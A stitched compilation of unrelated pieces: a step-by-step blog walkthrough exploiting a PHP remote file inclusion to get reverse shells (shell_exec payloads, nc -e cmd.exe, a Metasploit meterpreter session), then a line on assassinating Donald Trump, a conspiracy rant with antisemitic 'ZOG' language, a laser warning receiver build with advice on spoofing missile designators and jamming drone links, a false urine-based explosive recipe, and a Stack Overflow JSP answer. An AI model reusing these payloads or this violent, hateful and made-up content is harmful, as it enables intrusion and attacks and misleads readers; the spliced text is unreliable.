From RFI to Shell

Remote File Inclusion (RFI) is a web application vulnerability attackers exploit to run malicious code. Depending on the web server configuration, an attacker may tell the web app to include code from a file hosted on a remote server. In this post, I’ll describe how to exploit RFI to get a reverse shell on the target using two methods. The first will only use tools already on the victim, while the second will use the more feature-rich metasploit method.

The Vulnerability

This application has already been found to have a vulnerability in one of the parameters sent by addguestbook.php. This post won’t cover detecting the RFI vulnerability.

The request I will be tampering with to exploit this RFI vulnerability looks like this:

/addguestbook.php?name=hacker&comment=pwned&LANG=en&Submit=Submit

Using Default Tools

Before I know what I have to work with, I must find out what OS my target is running. The first method I’ll use to do this will be to run nmap and specify host fingerprint detection:

$ nmap -O 192.168.1.144
Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-10 10:41 EST
Nmap scan report for 192.168.1.144
Host is up (0.037s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
3306/tcp open  mysql
3389/tcp open  ms-wbt-server
MAC Address: 00:50:56:AF:1D:C4 (VMware)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).

Not a definitive answer, so I must trust, but verify. I’ll turn to the wappalyzer plugin for firefox. Wappalyzer has been accurate, in my experience. In either case, I’ll have to verify when I move on to the exploit phase of this exercise what the host is running.

Running Wappalyzer in my browser when I navigate to the target’s page, I see that it’s running Windows, indicated by the icon in my toolbar:

Without knowing what tools the target will have, I’ve at least narrowed it down to a handful, including ftp, tftp, telnet, and debug.exe.

I can think of a convoluted method using FTP, but that would take a while and may end up being imprecise. The same with telnet. Besides, telnet has been deprecated for quite some time, so I try to avoid it wherever possible. Debug.exe may provide a solution that would be even more convoluted than the FTP method, so I’ll stick with TFTP for this exercise.

My goal is to transfer nc.exe to the victim’s host and use it to open a reverse shell to my attacking host.

Setting up TFTP

The first step in this process is to set up the TFTP daemon and share nc. Since I don’t already have a shell on the target, I won’t know whether my commands will be successful, so I want to be as sure as I can that I won’t run into any “gotchas” – like improper file permissions. This means I need to be sure that the location I share using TFTPD is readable by anybody, and that the nc.exe file I share out will be readable and executable by anybody.

On my attacking host, I complete these steps via:

$ chmod +rx /usr/share/windows-binaries/nc.exe
$ cp /usr/share/windows-binaries/nc.exe /tmp/nc.exe
$ atftpd --daemon --port 69 /tmp/

I’m now sharing my /tmp directory, which contains my readable/executable nc.exe and is itself world-readable.

Exploit the Vulnerability

Now that I’ve got my payload ready, it’s time to exploit the RFI vulnerability on the victim. My Wappalyzer extension informed me that the host is running php, so my exploit will be written in php. I will do this by creating the files I want the victim to remotely include in my /var/www folder. Note I said files as this exploit will be carried out in two steps:

1. Upload nc.exe to the victim, and
2. Instruct the victim to execute nc.exe and connect back to my listener.

The first step will be carried out by the following php code:

#!php
< ?php
echo shell_exec("tftp -i 192.168.14.120 GET nc.exe");
?>

I’ll store this in a file called evil.txt in /var/www. This is saved as a text file because I don’t want myweb server to interpret it as a php file; I want to be sure it’s served as text content.

The second step of this exploit will involve invoking nc.exe on the host, and having it call back to my listener, establishing a reverse shell. Here’s what evil2.txt looks like:

#!php
< ?php
echo shell_exec("nc.exe -nvv 192.168.14.120 4444 -e cmd.exe")
?>

On a Linux host, it would look similar to:

#!php
< ?php
echo shell_exec("nc -nvv 192.168.14.120 4444 -e /bin/sh")
?>

Satisfied with these, I begin my webserver:

$ service apache2 start
[....] Starting web server: apache2
..

Enable My Listener

This crucial step involves invoking nc on my attacking box to listen for the reverse shell I will request:

$ nc -lvp 4444
listening on [any] 4444 ...

Exploit!

With everything in place, I make the first of my two requests to the web server:

/addguestbook.php?name=hacker&comment=pwned&LANG=http://192.168.14.120/evil.txt%00&Submit=Submit

Notice the . This is a null byte in URL-encoded format. This will instruct the web app to cease parsing or executing commands once it’s included the text (php code) in evil.txt. After waiting a few moments, I see the web app return the following information:

Transfer successful: 59392 bytes in 5 seconds, 11878 bytes/s

Excellent! This means that nc.exe has been uploaded to the victim. Now, to invoke my reverse shell, I make the following request:

/addguestbook.php?name=hacker&comment=pwned&LANG=http://192.168.14.120/evil2.txt%00&Submit=Submit

Again, using the URL-encoded null byte to ensure that application execution stops after evil2.txt has been parsed. If all went according to plan, I should see some activity from my listener:

listening on [any] 4444 ...
192.168.1.144: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.14.120] from (UNKNOWN) [192.168.1.144] 1144

Success!

Using Metasploit

Metasploit is awesome, and if there’s a chance to use it, I’ll take it. Here’s how the vulnerable application can be exploited using the Metasploit framework:

Search for a Module

I’m not sure what the best module to use for this exploit would be, so I do a search for “php_include”:

msf> search php_include

Matching Modules
================

Name                             Disclosure Date          Rank    Description
----                             ---------------          ----    -----------
exploit/unix/webapp/php_include  2006-12-17 00:00:00 UTC  normal  PHP Remote File Include Generic Code Execution

This looks like it will fit the bill. I’ll load it up and see what my options are:

msf> use exploit/unix/webapp/php_include
msf exploit(php_include) > show options

Module options (exploit/unix/webapp/php_include):

Name      Current Setting                                                    Required  Description
----      ---------------                                                    --------  -----------
HEADERS                                                                      no        Any additional HTTP headers to send, cookies for example. Format:  "header:value,header2:value2"
PATH      /                                                                  yes       The base directory to prepend to the URL to try
PHPRFIDB  /opt/metasploit/apps/pro/msf3/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI                                                                       no        The URI to request, with the include parameter changed to XXpathXX
POSTDATA                                                                     no        The POST data to send, with the include parameter changed to XXpathXX
Proxies                                                                      no        Use a proxy chain
RHOST                                                                        yes       The target address
RPORT     80                                                                 yes       The target port
SRVHOST   0.0.0.0                                                            yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT   8080                                                               yes       The local port to listen on.
SSLCert                                                                      no        Path to a custom SSL certificate (default is randomly generated)
URIPATH                                                                      no        The URI to use for this exploit (default is random)
VHOST                                                                        no        HTTP server virtual host

Exploit target:

Id  Name
--  ----
0   Automatic

Good deal, this looks pretty straightforward. I will need to specify the PATH, PHPURI, RHOST, RPORT, SRVHOST, and SRVPORT for this to be effective. The RHOST and RPORT bits are easy, they’re the remote host and default HTTP port. SRVHOST will by my attacking IP, and SRVPORT must be a port not already bound on my IP.

The PATH for this exploit will be /, as there is no path to the web application, it is hosted at the web root. PHPURI is the URI to request, with the vulnerable parameter changed to XXpathXX, so this will be

addguestbook.php?name=hacker&comment=pwned&LANG=XXpathXX

Exploit with MSF

I’ll set these values and then run the exploit to obtain a php meterpreter shell:

msf exploit(php_include) > set PATH /
PATH => /
msf exploit(php_include) > set PHPURI /addguestbook.php?name=hacker&comment=pwned&LANG=XXpathXX
PHPURI => /addguestbook.php?name=hacker&comment=pwned&LANG=XXpathXX
msf exploit(php_include) > set RHOST 192.168.1.144
RHOST => 192.168.1.144

As always, I need to set the PAYLOAD and the PAYLOAD options. Fortunately, MSF has a php meterpreter payload:

msf exploit(php_include) > set PAYLOAD php/meterpreter[tab]

set PAYLOAD php/meterpreter/bind_tcp       set PAYLOAD php/meterpreter/reverse_tcp   
set PAYLOAD php/meterpreter/bind_tcp_ipv6  set PAYLOAD php/meterpreter_reverse_tcp   
msf exploit(php_include) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(php_include) > show options


Module options (exploit/unix/webapp/php_include):

Name      Current Setting                                                    Required  Description
----      ---------------                                                    --------  -----------
HEADERS                                                                      no        Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
PATH      /                                                                  yes       The base directory to prepend to the URL to try 
PHPRFIDB  /opt/metasploit/apps/pro/msf3/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL 
PHPURI    /addguestbook.php?name=hacker&comment=pwned&LANG=XXpathXX          no        The URI to request, with the include parameter changed to XXpathXX      
POSTDATA                                                                     no        The POST data to send, with the include parameter changed to XXpathXX 
Proxies                                                                      no        Use a proxy chain 
RHOST     192.168.1.144                                                      yes       The target address 
RPORT     80                                                                 yes       The target port 
SRVHOST   0.0.0.0                                                            yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0 
SRVPORT   8080                                                               yes       The local port to listen on. 
SSLCert                                                                      no        Path to a custom SSL certificate (default is randomly generated)     
URIPATH                                                                      no        The URI to use for this exploit (default is random) 
VHOST                                                                        no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- ----------- 
LHOST                     yes The listen address 
LPORT           4444      yes The listen port

Exploit target: 

Id Name
* * *
0 Automatic


msf exploit(php_include) > set LHOST 192.168.14.120
LHOST => 192.168.14.120 
msf exploit(php_include) > set LPORT 7777
LPORT => 7777 
msf exploit(php_include) > exploit -j -z 
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.14.120:7777 
msf exploit(php_include) > 
[*] Using URL: http://0.0.0.0:8080/NKLGe9SyP 
[*] Local IP: http://192.168.14.120:8080/NKLGe9SyP 
[*] PHP include server started. 
[*] Sending stage (39848 bytes) to 192.168.1.144 
[*] Meterpreter session 1 opened (192.168.14.120:7777 -> 192.168.1.144:1110) at 2014-01-09 20:27:58 -0500

msf exploit(php_include) > sessions

# Active sessions

Id Type Information Connection 
-- ---- ----------- ---------- 
 1 meterpreter php/php offsec (0) @ XPCLIENT 192.168.14.120:7777 -> 192.168.1.144:1110 (192.168.1.144)

msf exploit(php_include) > sessions -i 1 
[*] Starting interaction with 1...

meterpreter >

Et Voila!

https://penetrate.io/2014/01/10/from-rfi-to-shell/

All right...how to assassinate Donald Trump...Mossad...you do like this...you know the schedule of the convoy and the final arriving, you use 3 police cars and mercenaries disguised as police officers

THE ATTEMPTED ASSASSINATION OF PRESIDENT RONALD REAGAN

Footage Shows RPG and AK-47 Ambush on Convoy

Internet Hack Cable Modems Docis 1.0 - 3.0 Download Whatsapp send me ya...

NATO HACKING

Battlefield Laser Warning Receiver

---

Introduction

"In the far distance a helicopter skimmed down between the roofs, hovered for an instant like a blue bottle, and darted away again with a curving flight.  It was the Police Patrol, snooping into people's windows.  The patrols did not matter, however.  Only the Thought Police mattered."  --- Quote from George Orwell's 1984.

Barack Hussein Obama, Jr. is a fraud.  A Kenyan-born Marxist Muslim usurper.  A creation of the liberal media.  A puppet for a handful of international central bankers and the 1%.
He's kept aloft by a continually dumbed-down public (to keep them voting Democrat), blindly ruled by oligarchs.  Surrounded by his gang of anti-American extremists and tyrants who wish to control your every thought and move.
Steal $1.2 billion from MF Global and you can run the Obama re-election campaign.  "Steal" a bunch of taxpayer-funded academic papers and you'll have your entire life ruined.  You don't need to show an ID to vote to start a war, but need a full interrogation to fly on a plane or to enact your God-given right to own a gun.  Change!
As the traitorous Goldman Sachs/General Electric/Chicago Mafia Obama regime continues to turn the United States into a nation of takers instead of a nation of makers, expect to see more violent extremism and corruption, the endless printing of funny money to keep the public docile, and racially-motivated attacks against his political enemies - all in order to take the public's mind off his failed policies and your loss of freedom.
Their latest tool is using unmanned Predator/Reaper drones equipped with laser-guided AGM-114 Hellfire missiles to kill people - including Americans - without any type of due process or jury trial.  Change!
Most U.S/NATO/ZOG laser-guided bombs and missiles use a diode-pumped, Q-switched (pulsed) Neodymium-doped Yttrium Aluminum Garnet (Nd:YAG) laser designator operating at a 1064 nanometer (+/- 2 nm) wavelength.  The designator's optics will have a low divergence, with most under 300 microradians.  That means the laser beam's effective area is about 1 meter square (or smaller) at a range of 3 kilometers.
The laser's pulse width is around 15 to 25 nanoseconds with the pulse energy around 50 to 120 millijoules.  The use of very narrow pulses means the peak output optical power is actually several thousand watts.  The laser's Pulse Repetition Frequency (PRF) is usually between 8 to 20 Hz (+/- 1 µS pulse resolution) and is externally selectable.
An individual PRF "code" is what is programmed into the bomb/missile seeker and laser designator ahead of time.  The codes are three modified-octal digits (111-488 [Band 2] and 511-788 [Band 1]), but some codes are four digits and should always start with a "1" (1111-1788).  There are a total of 677 different codes.  The code numbers determine the pulse rate, and the faster pulses are easier for the missile's laser seeker to lock-on to in a cluttered environment.  Each weapon system is assigned its own laser code to prevent interference with other systems.  NATO designator codes are officially listed in STANAG 3733, which is not available to the public.
I believe the codes may be directly related to the PRF or the somehow related to the timing between the laser pulses.  For example, code 1234 would have a 12.34 Hz PRF.  A confirmed operational (Apache-launched) Hellfire missile laser code is 1155.  Overhead Predators can "lase" targets for the Apaches, if so needed.
The laser designator illuminates the intended target and the bomb/missile seeker "flies" into the reflected energy.  There can be up to 30 seconds from the time the laser is activated to the impact of the bomb/missile.  The laser designator and the bomb/missile seeker head need to both be pointing towards the target before launch.  A laser "back scatter" condition can exist where sand/dust/etc. in the air causes a false lock before the bomb/missile is launched.

High-Speed Infrared Video of an Active Laser Designator The Hellfire missile has an indirect launch mode called "lock-on after launch" in which the missile is initally launched in an unguided mode, then seeks out the laser reflection while in the air.  This is a countermeasure to minimizes the amount of time the laser designator needs to be activated.  The maximum range of the Hellfire is around 8 km.
Another potential countermeasure is called "offset designating," where the laser is aimed at a location near the target but just far enough away not to trigger a laser warning alarm.
If you're a troublemaker, it should be possible to detect the activation of an enemy laser designator, then generate YOUR OWN laser pulses at the same PRF.  You'd then point your high-power laser at a nearby location to "distract" the incoming bomb/missile from its intended target.
Note that the seeker PRF codes are often transmitted over the various open radio channels (or standardized) and some laser-based professional tattoo/hair removal systems use the same type of pulsed Nd:YAG laser...
Many UAVs can be located and tracked via their optical, acoustic, and radio emissions.  Directional microwave and satellite wireless links combined with spread-spectrum modulation is making this increasingly difficult for the undocumented SIGINT interceptor, but you'll be surprised what's out there.
Yes, some UAVs use commerical satellite relays when not operating in a "line-of-sight" mode.  eBay has all sorts of high-power Ku-band uplink transmitters and amplifiers you can use to jam, err... "simulate noise" on those particular satellite channels.

Example Predator UAV RF and Optical Emissions

Overview

This Battlefield Laser Warning Receiver (LWR) project is a very experimental design to try and detect the pulses emitted from an enemy laser designator.  The circuit will use mostly off-the-shelf components to reduce cost and to simplify the construction.
While searching through patents for "laser warning receiver," I came across U.S. Patent 5,260,563 by Tracor Aerospace.  This patent appears to be for their portable LADIS (Laser Alarm for the Individual Soldier) battlefield laser warning system.  A few components in their schematic are unlabeled, but can be determined via the detailed description of the circuit's operation in the patent text.
This LWR project will be based on the stock Tracor schematic, but with a few minor changes.  You'll want to print out the patent, then read and re-read the entire text before constructing this circuit to get an idea of what's going on.  A different front-end PIN photodiode pre-amplifier circuit will be constructed as I was unable to get the circuit in the Tracor patent to operate properly.
The main optical sensor will be three Vishay BPW34 silicon PIN photodiodes in parallel.  These are not the ideal photodiodes for detecting a high-speed laser pulses at 1064 nm, but they're cheap (around $1 at Digi-Key) and they're also listed in the Tracor patent.  InGaAs PIN photodiodes salvaged from high-speed fiber optic connections will provide a much better response at 1064 nm, but silicon PIN photodiodes will still work for experimenting.
This should still be considered a test circuit to get a general idea of what it takes to detect a high-speed laser pulse.  An "ideal" battlefield LWR would have multiple optical sensors (and log amps) to cover the full 360°, plus a couple pointing up for aerial coverage.  Combined, these could also provide bearing data back to the enemy designator.
The original Tracor design has a simple Automatic Gain Control (AGC) circuit to help discriminate against background light pollution or sunlight, but optical (infrared) bandpass filtering the incoming signal is still recommended.
Because of the LWR circuit is intended to detect very fast rise-time laser pulses, the front-end amplifier(s) should be designed with a fairly wide RF bandwidth (100+ MHz) in mind.  Proper RF circuit constructing techniques, such as a large ground plane, surface mount components, RF shielding, and proper DC power supply decoupling, should be followed to prevent the circuit from oscillating or amplifier degradation.
The three parallel BPW34 PIN photodiodes (making up a single array) will have a reverse bias voltage (+10 VDC) on them to help increase their detection bandwidth.  A 2N4416A JFET provides a very high impedance buffer between the PIN photodiodes and the next stage amplifier.
The signal pulse from the 2N4416A is amplified by a Motorola MWA120 Wideband General-Purpose Hybrid Amplifier.  The MWA120 has a fixed gain of around 14 dB from DC to over 400 MHz and a standard 50 ohm input/output impedance.  The MWA120 probably isn't the ideal amplifier, but I had a couple laying around and they require a minimum of supporting components.  The detected laser designator pulses should be fairly strong, so not alot of gain is required.  Wideband video amplifier ICs like the National LM733 should also work.
The output from the MWA120 is sent to a Motorola MC13055 Wideband FSK Receiver to generate a logarithmic output voltage based on the input power of the signal pulse.  The MC13055 has around 70 dB of input power detection range (-80 to -10 dBm).  The higher the power of the pulse is, the higher the voltage output will be.  The Tracor circuit uses a Motorola MC13055, but the Motorola MC3356 should also work and may be a little easier to find.
The logarithmic voltage output from the MC13055 is then sent to a LM311-based comparator circuit.  When the output pulse voltage reaches a preset threshold setting determined by a panel-mount 20 kohm potentiometer, the LM311's output goes high.  The LM311's output can be used directly as a "digital" logic level (10 volt) signal, or to trigger a 555-timer in a monostable "pulse stretcher" operation.  The 555 can then light a warning LED or signal an audio buzzer as the final laser warning alarm.

AGM-114 Hellfire on a Predator Drone

Pictures & Construction Notes

Overview of the parts for a single BPW34 PIN photodiode array for the Battlefield Laser Warning Receiver.
Three surface-mount Vishay VBPW34S PIN photodiodes are arranged in parallel and mounted behind a SO-239 connector which has had its internals removed.
The coupling ring is from an old CB radio microphone connector.  It uses the same threads as the SO-239 and will be used to hold an optional infrared bandpass filter.

Closeup view of the three parallel BPW34 PIN photodiodes mounted onto a little circuit board with matching holes for the SO-239 connector.
The drilled out (1/2-inch) SO-239 connector is on the right.

Attaching the BPW34 PIN photodiode circuit board to the rear of the SO-239 connector.
The inside of the SO-239 connector should be painted flat black to prevent off-axis reflections.

Shown with the optional infrared bandpass (808 - 1064 nm) filter.
These filters are available on eBay for around $10.
The 15 mm diameter filter fits the coupling ring perfectly.
Search eBay for something like "Filter Color Glass Lens against 400nm-750nm through IR Infrared 808nm-1064nm."
Really...

Completed single PIN photodiode sensor array for the Battlefield Laser Warning Receiver.
For a real-world application, multiple PIN photodiode sensors should be used and arranged for 360° coverage, as well as a few for aerial coverage.

Overview of the front-end amplifier circuit for the PIN photodiode array.
The small-canned item is the 2N4416A JFET buffer.
The large-canned item is the MWA120 amplifier.
This board is powered from an external +10 VDC source.
The front-end amplifier is on a separate circuit board (and uses leaded components) due to continuous experimentation.
An ideal front-end amplifier circuit should have a little more gain and include some type of automatic gain control.

Overview of the logarithmic amplifier, comparator, and alarm generating circuit.
This circuit has been pretty well debugged and should work as-is.  It's based around the logarithmic amplifier and comparator circuit in the Tracor patent.
A LM117 voltage regulator is along the top.  This generates a clean source of +10 VDC for the circuits from a +12 VDC input.  The current draw is minimal.

Alternate view of the logarithmic amplifier, comparator, and alarm generating circuit.
The +12 VDC power comes in on the lower-right.
The 16-pin IC is the MC13055 logarithmic amplifier.  The 555 pulse stretcher circuit is below it.
The two items in the middle which look like transistors are the MBD301 Schottky diodes for the LM311 comparator circuit.  A LM211 is used in place of the LM311 in this example.
When a proper "pulse" is detected by exceeding an externally settable threshold on the LM311 comparator circuit, it toggles a transistor which in turn activates the 555 pulse stretcher (monostable) circuit.  The large orange 1 µF capacitor is part of the 555's timing circuit.
The 555 timer essentially turns the incoming nanosecond pulses into 10 millisecond long pulses.
These longer pulses are used to directly sound a buzzer or light a LED to act as a final warning alarm.

Completed circuit, internal overview.
Mounting the circuit boards in an old printer switch case.
+12 VDC power input is via the banana jacks on the upper-left.  A power-indicating red LED and power switch are above it.
The green toggle switch isn't used at this time.
The yellow Alarm Select toggle switch choses either a buzzer or LED warning alarm.
The 20 kohm potentiometer sets the threshold in the pulse comparator circuit.
A 1/8-inch stereo jack is used to connect to the external PIN photodiode array.  Be sure to use shielded wire.  The tip should be the cathode, ring the anode, and sleeve the ground.
A front-panel mounted BNC jack is used to directly monitor the MC13055 logarithmic output voltage.  This output can also be used for further signal processing.  A small piece of coax should connect this output to the front-panel BNC jack.

Alternate interior overview.
A warning alarm buzzer has been added.  This is selectable via a switch on the front-panel.
The buzzer should have its own internal driver circuit and should also be capable of being driven directly from a 555 timer.  If it can't, an additional transistor driver should be used.  Radio Shack carries a couple of suitable buzzers.
The buzzer will sound in unison with the detection of the incoming pulses.  For example, if the laser designator PRF is 12 Hz, the buzzer will also sound 12 times a second at 10 millisecond intervals.

Completed Battlefield Laser Warning Receiver.
The logarithmic amplifier Monitor BNC jack is on the lower-left.
The PIN Input 1/8-inch stereo jack is mounted above it.
The 20 kohm Threshold potentiometer is in the middle.
The green laser warning LED is below the Alarm Select switch.
To use the unit, connect the PIN photodiode array via a standard shielded stereo cable with a 1/8-inch plug (tip: cathode, ring: anode, sleeve: ground).
Turn the Threshold control completely counter-clockwise.
Apply +12 VDC power to the unit and turn it on.
The buzzer should sound or the LED should light, depending on the Alarm Select switch setting.
Slowly rotate the Threshold control clockwise until the buzzer/LED stops.
This sets the minimum pulse threshold for that particular environment.  The Threshold control may need to be continually adjusted to match other lighting conditions.
To test the LWR, set the Alarm Select switch to buzzer, then point a standard TV remote control at the PIN photodiode array.  Pressing any buttons on the remote should cause the buzzer to sound.

Schematics

• Battlefield Laser Warning Receiver - Schematic #1  Front-End Amplifier


• Battlefield Laser Warning Receiver - Schematic #2  Log Amplifier / Comparator / Alarm

Datasheets & Notes

1. Higher resolution pictures and the original project article are available in GBPPR 'Zine Issue #109


2. GBPPR Vision #11: Battlefield Laser Warning Receiver  (YouTube)


3. Vishay VBPW34S Silicon PIN Photodiode  (167k PDF)


4. Vishay 2N4416A N-Channel JFET  (54k PDF)


5. Motorola MWA120 Wideband General-Purpose Hybrid Amplifier  (424k PDF)


6. Motorola MC13055 Wideband FSK Receiver  (362k PDF)


7. National LM311 Voltage Comparator  (922k PDF)


8. Motorola MBD301 Schottky Diodes  (93k PDF)


9. Philips CMOS 555 Timer  (108k PDF)


10. Atmospheric Transmittance of the Electromagnetic Spectrum


11. Wavelengths of Various Solid-State Lasers


12. Detecting Modulated Lasers in the Battlefield and Determining their Direction  (526k PDF)


13. Laser Terminal Homing Engagement Simulator  (3.8M PDF)


14. Analysis and Test of a Wide Area Spectrometer  (2.6M PDF)


15. Computer Simulation of a Laser Designator in the Operational Environment  (1.9M PDF)


16. Laser Designator Interoperability Trials  (1M PDF)


17. Airborne Laser Systems Testing and Analysis  (12.9M PDF)


18. Northrop Grumman Ground Laser Target Designator (GLTD) III  (189k PDF)


19. Northrop Grumman Lightweight Laser Designator Rangefinder  (154k PDF)


20. Northrop Grumman PEQ-1C Laser Acquisition Marker  (118k PDF)


21. Cilas DHY 307 Ground Laser Target Designator for Laser-Guided Weapons  (429k PDF)


22. IAI/TAMAM DART45 Compact Dual Wavelength Laser Designator and Rangefinder Module  (671k PDF


23. Elbit Systems Rattler G Dismounted Coded Designator / Marker  (222k PDF)


24. L-3 Communications Advanced Laser Systems Technlogy (ALST)  (689k PDF


25. Metrodat LAWAREC Laser Warning Receiver  (381k PDF)


26. Selex Communications RALM 02/V2 Laser Warning Receiver  (69k PDF)


27. Thales TYR Laser Target Designator and Imager  (293k PDF)


28. Excelitas High Angular Resolution Laser Irradiance Detector (HARLID)  (694k PDF)  (LWR Products Division)


29. Epitaxial Ultrasensitive, Wideband Laser Warning Receiver  (473k PDF)


30. Boston Electronics Detectors for Laser Warning Receivers


31. USMC Ground Laser Target Designator II - New Equipment Training  (3.7M PDF)


32. Saab: Next Generation Laser Warning  (872k PDF)


33. Joint Laser Designator Procedures  Joint Pub 3-09.1  (1999 Version)  (855k PDF)


34. Laser Warning System to Detect the Number of Receiver Front-End Design  (PDF)


35. Laser Warning Receiver  by Jin Mei  NAIC-ID(RS)T-0149-96  (931k PDF)


36. High-Speed Fourier Transform Spectrometer for Laser Warning Receivers


37. Tactical Laser Systems Performance Analysis in Various Weather Conditions  (1M PDF)


38. The Vulnerability of Laser Warning Systems Against Guided Weapons Based on Low-Power Lasers  (4.1M PDF)


39. Airborne Laser Systems Testing and Analysis: Laboratory Experimental Activities  Chapter 7 of NATO RTO-AG-300-V26.  Includes oscilloscope screen shots of real laser designator pulses.  (1.6M PDF)


40. AN/AVR-2A Laser Warning Receiver on an Apache Helicopter - #1


41. AN/AVR-2A Laser Warning Receiver on an Apache Helicopter - #2


42. AN/AVR-2A Laser Warning Receiver on an Apache Helicopter - #3


43. Heat-Seeking Missile Guidance


44. Tiny Device Will Detect Domestic Drones  (Indiegogo Site)


45. SkyJack: A Drone to Hack All Drones  (SkyJack Code)


46. Not a Bug Splat  A giant art installation targets Predator drone operators.


47. Drone Survival Guide  (English PDF)


48. Pulse Code Recognition Method and System  U.S. Patent 5,023,888  (428k PDF)


49. Method and System for Pulse Internal Modulation  U.S. Patent 5,026,156  (1.3M PDF)


50. Predator UAV Engage a Group of Insurgents With a Hellfire Missile in Iraq  When "LRD LASE DES" appears on the display, the Predator's laser rangefinder/designator is enabled.  (YouTube)


51. Lockheed Martin's DAGR Missile  Adding laser guidance to 2.75 inch Hydra rockets.  Includes a nice infrared camera view of the laser designator's target spot.  Note the laser designator's low divergence on the 5 km target.  (YouTube)


52. Predator Strikes  (YouTube)


53. The laser designator PRF code for the AC-130H is fixed at 1688, which I think corresponds to 10 Hz.


54. PRF codes for laser-guided bombs (GBU-12, etc.) are set prior to taking off and cannot be changed "in the air."


55. Pulse Interval Modulation (PIM) codes can vary the timing between pulses, these are usually used on U.S.-only weapons systems and are harder to defeat via countermeasures.


56. The minimum launch range of the AGM-114 should be set for around 16 seconds of flight time and a 60° angle of depression.


57. The AGM-114L Hellfire uses a millimeter wave radar seeker operating in the Ka-band, which is around 35 GHz and the same general frequency range for the Longbow Apache's radar.  There's also a bunch of military stuff around 38 GHz.


58. The laser seeker operates in a clockwise pattern, starting at the lower-right position 2° down and 8° right.


59. If you're really good, you can get a laser retro-relection off the bomb/missile seeker's glass cover and actually track & monitor the incoming munition.


60. The non-pulsed infrared laser designators/illuminators used to mark targets to be viewed via standard night vision devices operate around 820 - 860 nm.


61. Eye-safe laser designators and range finders operate around 1540 nm.
Other Related GBPPR Projects:

62. Laser Bounce Listening Device


63. GBPPR Interferometric Surveillance Device Experiments - Part 2


64. GBPPR Homebrew Radar Experiments


65. Defeating Passive Infrared Motion Sensors


66. Techniques for Countering Thermal Imaging Devices

http://67.225.133.110/~gbpprorg/mil/laser/ 

corte de cabelo ultra rápido 02/2017

UREA EXPLOSIVE

Well, everybody laugh of the urine explosive, because those who understand explosives, know that urine has 95% of water, and only 5% urea (the real explosive chemical) , so it's the urea destilled from the urine, whith pure vaseline and charcoal, all mixed with your hands, and then ready to blow up, which is a powerfull bomb. So, next question, how to get urea, from urine? you use your urine in a pot, for as long as 24 hours, on the refrigator with 4 degrees. than you boil the urine to get a mass, which still contains salt, therefore, not ready yet; then you boil again with ethanol (50 gm of urine salt mass with 1 liter of ethanol) at 20 degrees. To end, you filter the remain liquid, and there it is, pure urea explosive.

Sound Effects Of Terrorism | Jihad | HQ

A forward does not change the URL in browser address bar

A forward basically tells the server to use the given JSP to present the results. It does not tell the client to send a new HTTP request on the given JSP. If you expect a change in the address bar of the client, then you have to tell the client to send a new HTTP request. You can do that by sending a redirect instead of a forward.

So, instead of

RequestDispatcher d=request.getRequestDispatcher("/index.jsp");
System.out.println("z");
d.forward(request, response);

do

response.sendRedirect(request.getContextPath() + "/index.jsp");

An alternative is to get rid of the /index.jsp URL altogether and use /Hai URL all the time. You can achieve this by hiding the JSP away in /WEB-INF folder (so that the enduser can never open it directly and is forced to use the servlet's URL for this) and implement the doGet() of the servlet as well to display the JSP:

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    request.getRequestDispatcher("/WEB-INF/index.jsp").forward(request, response);
}

This way, you can just open http://localhost:8080/Project/Hai and see the output of the JSP page and the form will just submit to the very same URL, so the URL in browser address bar will basically not change. I would maybe only change the /Hai to something more sensible, such as /login.

https://stackoverflow.com/questions/9221650/a-forward-does-not-change-the-url-in-browser-address-bar